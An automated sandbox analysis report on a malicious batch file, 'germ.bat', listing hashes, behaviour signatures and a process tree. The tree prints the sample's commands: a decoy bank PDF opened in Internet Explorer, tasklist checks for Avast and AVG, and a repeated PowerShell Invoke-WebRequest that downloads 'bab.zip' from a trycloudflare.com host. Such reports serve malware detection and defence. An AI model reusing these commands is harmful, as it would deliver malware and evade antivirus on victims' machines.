Analysis
-
max time kernel
121s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
02/12/2024, 16:31
General
-
Target
germ.bat
-
Size
44KB
-
MD5
cdbebe5916a327e5cb724137f5fa439d
-
SHA1
7595a9c2978344b9be73c9478c1d6bac128bf0a3
-
SHA256
eb0f82f6f7cae84885ef1c829836a368615045598db243904bfbd53d976e686d
-
SHA512
6ae8f6c3fd0288ac1844e1cd84272220e3b9fa082dba0a27294ff83961f7a71e8b1924f46cc758bf3273d5c80862c451c6951500546e4827be0ed5cac67adbe7
-
SSDEEP
768:fkRLJpCVvO1FA++aIWoECcej7NuIEEv8MYW+ANdZbQwex1LIGbtmCFQy5sZ72fne:tNO1FA++aeECf3A9M
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Powershell Invoke Web Request.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\germ.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.bankbsu.ch/dam/jcr:72a8b29f-cccb-4e0f-9007-49b7e1773910/Factsheet-Unternehmen_QR-Rechnung.pdf2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2952 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq AvastUI.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\find.exefind /i "AvastUI.exe"2⤵
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq avgui.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\find.exefind /i "avgui.exe"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://every-sailing-editions-longer.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://every-sailing-editions-longer.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://every-sailing-editions-longer.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://every-sailing-editions-longer.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
342B
MD5f9edcbfff9d0146571224dc76eecd814
SHA1544e55ae896f391da311a02219f71b63bb99a159
SHA256535251497e7c94dcafffc5fd0422a47f1bcb70790cc6aa7706f6b710abb4c4c4
SHA512d551996383cab04f13f3b634b0064673921ce8fcf2aaef7df3bbc47595a17d8290347ce991193b6ddec83de5713718ee8772b010712ece938288f7be78652875
-
Filesize
342B
MD5d7b111631e0a75ff1840444536112756
SHA19d831aaf8425ea9248207346458e14c929d01ba8
SHA2562e7640b03e810d1af4861dc14f3191433119329dfa52c643d3c583eaf7e5c847
SHA512fb4ccdc20156fad9f529641f3651addc0a0314d3b2e188e3eeb51ac570a99922a76dbea2a24fc2e4cad10bdb1c6e98be18298d231c1f90dda0cd6b74e6826920
-
Filesize
342B
MD59f1aeee6f176fc68bd73d5700cf9b655
SHA14b08b82e052ff7c609e5ec96e5cddb1c47042f4c
SHA2564cea451784da35e58ec2b82f57e4e30f8e2417f5124c32004d3b660ce2ab9bc8
SHA512e1df9b646369cd1662f95d415fcac0d94ac428eee729ca5b42517786b51a9abd39d8f0c71e55e9e879c7377dcb81a16e33ac96e8bf9403246f9888346a0e7b30
-
Filesize
342B
MD58e4addc1987f9cdb74cf014729ad76c1
SHA19ac485a876e0f29c3be2a74f8073bf9b11a1b8de
SHA2566cf66fa66105f5650b2e437484455ec56485fbcb9aaf25bc700f78cbbeb6e1bb
SHA512e2ef42618578f0443745c8e2ad9269df007e46acb4474988c82bd7d03a913841efda5a34731e362107210ecac8add9695b570246961bec3e12052ac743bcf47e
-
Filesize
342B
MD5173489b754e65d621b9dfb12bc5a54b1
SHA1d74433ff243e99a986ca07e9be9dc31761c0c79a
SHA2560961c9a5d1f54a99f3d4b2942b4afb24864574b5d1a010fac20c696aea1bc9d7
SHA5127f7f7a6160cfa38e1c5342047a5b5457e842eed0c0d1dcaa07523a011f7cf6d842e2dedde617b6fac1d4c4464766244988389afca89c2a9ab84de1125f3075c7
-
Filesize
342B
MD55d07769f9e803a9d1cbfec9b632b4fc7
SHA1df3272c15f381abc0d00e458b526a2e50e637a17
SHA25679713ed36fac42a3cf0d9be60408ea1ebb34709b50d53b89ebbcc5645aee80bd
SHA512abba766b4f4eda67cd8ba5f495fb9e3848e6ff468d0fdd030a6c8b6da0b3e22b745d80ccc82b1cec18a7a0d8b157800c738d30c56842558dd4be692513dc5f22
-
Filesize
342B
MD569aa1636ddfbdf78445555147235d1b8
SHA1f092c866e645d50a59a41a44621f4bcce6eedf5f
SHA2565e7251f13142f3b6337e09c4810603770428fa6febec4b84f7f04d83a1801dc4
SHA5122abd818a35be32e84afe3ec9246443b45e362d39c4fe9158373c1f010d635f94aa05651a5f698b643feabd501caa5964337fd06a9d94409cb6efcbf989fdd23f
-
Filesize
342B
MD55022a98993a1611c4235d524f7a00852
SHA1d65afd641eb1ab39666b363c2d899b17e7c371b9
SHA2569191051141f118c00f68035e291a8bd1e3c43ab2036e4640dae3545d91e40604
SHA51283eb323420d4ae2d83c4fb35cdd527d05392d022acf2b7551656aba88235008a2e5bb048148d43382e3b74a1bf60cbd57d63b8d1260eb09d66e96ad03947721c
-
Filesize
342B
MD5d9aa5a4f2ca09998a826f35d461dff2c
SHA12f2060678771350a66da37ac54f272a66c24a793
SHA256455df1662d5d2e45a30625bb632d696b12f7217d873814c09c95cec7268b311e
SHA51265863d11ec1255e8f6ebb32a76a41aaac62bc44b992b5394cd0e234b9da48b1ac14dfc5e5e60339f7cac21a3af46f915add9e37d9193f7863cf37be4f4d75f34
-
Filesize
342B
MD52912f2dd19cec4ef3cd96b2ab94efd0e
SHA1800aecc0c5652f60a96776dd239dfd8aa5b084b4
SHA256b26f4bf71ba1ae4f56d83a642250c8284011f21489f8ce53fd6427ca3511de84
SHA5123ebaefedde24af3e181839c5a2c0c8c4cff3edfa0236940bcc3fcbeb66170ed7d38f9de18d58f175418cd10be656b49299e72e9661bc991434b34ea98c42f6aa
-
Filesize
342B
MD579add43b0461f378f760a737798f33be
SHA16a4d3586545285f0440bc5a8920cdce14a0507d6
SHA25685dad0b439e3f0ff54e15cd6a0b98f291382fd8d1c108a82e4489eb44be50a5c
SHA512f259e779a815bf82c12339024d972904f71f66219690c88e765655451d7c73581307ebaf2efe9d705aba78dbba033e39929c199a9e32419dc0cf02b487942e77
-
Filesize
342B
MD5c6df713ab8e4f20b7c8edd05a4543ff2
SHA16335e260bd8d42ef5957251654975a015d93015b
SHA256655603c80430b698467dd27c4dbaec9b5c837111395d9830a00da523ccaa267b
SHA512f648dc03eab44931fd3e75c3d7ad1316c408024929abc5bf0c1d8408587d1f9fc7b89aaf154ce8b1e22158565f210225641c0970ef0702fbbc502fc7c219307a
-
Filesize
342B
MD543ba582f968b1d1f74e03b096e7908de
SHA1b765d3cbec828c7418f1184efc2e2f6d4f462209
SHA256fee6e218ac2e6e60bef8380d3b4bc5484833396a7039d7c07d3b1e3428595b7a
SHA5127e985f6757a534480b66e8fe31997b351e3041925f407671ec4b7ae270d58a69ce761caefc84c561956f75424c0dc3d3ad19ef0455a1c1e1d7870f12d3a6f1b7
-
Filesize
342B
MD549609791321edb6f049b98dfd0c42b10
SHA15039f73982067e2483bde4f1c7a639a734437245
SHA2566386c47e75333a95a2a3621edd611ae66f79be4831071c67e0222dd77aa024a6
SHA512f72c0ad33bede3c61157868a69fde9f0a7e727a869a042d66093d4c468346ebf83e640d07b2c48671336cd5e66a611b1a94f060f25a19674e94e1227d57b0365
-
Filesize
342B
MD547e4be291cfdf2b46b8a290d32950778
SHA14fead7fb5e94276d4f18a9fe205cdfe422eea34b
SHA256888bc874fa95cc00540db1d77603ee865f6fb782c7b8e9c6726a39fab416acb4
SHA51276810e1987c1344ed69a3d6c1fc65e82d8cd120a38e0f1d1541e7fb52e7e1c83b0d341ef1f9cf8a32ce19ddbbd1cf4d469450d33b593a0f408e9ee99a768df95
-
Filesize
342B
MD59ab0282be74f13de7e3fe566f2a9ab11
SHA154865a4ed0567ddae9fa7e5c7c363a48b09f2328
SHA256b52de15b10f545a33166ec76d557c4ea59092d462983fe273920b0b1707f7d2b
SHA512d9e2bdd46fa460434f00d2c4cefce4f21f0f2ec6f8a0789bf64e0ba3d031404fe1e0c13b91a9833859cb7f1e91c2033fef5179865639171d27bb13d0394fe199
-
Filesize
342B
MD573df9529b798b00c0d87e6f4169fdddb
SHA10a43b46c3c5643f8c223b5dd7137de7a8682cf66
SHA256b97c54f82b96f42ffc9c7161c511b781e5f20081ceee6daad7db78bbef0f527a
SHA512ffdb4a737835b2e4a9c2ee786b3fb34521c5a09daa245320c7bbb4d3365dc79b840fb56def5dd3da303e7ab448b57ba480a6af7591d553b387beeb76f750dd71
-
Filesize
342B
MD5ef8903752bf5ba83b60ef308bcaf4702
SHA1ed685c0ab03c5baab3c824d962b9d1a657f61ba2
SHA256b35cae77a7c08e0b86e95fcf3d0c1c88062ef0a6404772dfbd1b705de70eaa93
SHA512f3c3f9be57a1433dabad24a8689122e04a0d80b5e50a3995f5ddcfe99aa5f04f28b7c5e660148224c7b6bca9533703e79bb4cc6a49da1954aaf4864bdefacf3a
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
7KB
MD5fdefd9e98f2a16190a294240831a7d43
SHA1b7dc386a6bf26ab0ad9719a33282a848452d03fd
SHA256aa563fa8f345be7c0eb87ca84f8e3b62377d04329996f9273326cc394ee1eec1
SHA512079028d0185cbe6a7deb6a07ad834af644b9ea8fcafacb67726e37d2d8baccc1238adfdcf1c162948fa6a9f98139fed3eb3783446d92c0a9e7a5e6d47ddfa0e4
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
2.9MB
-
Filesize
32KB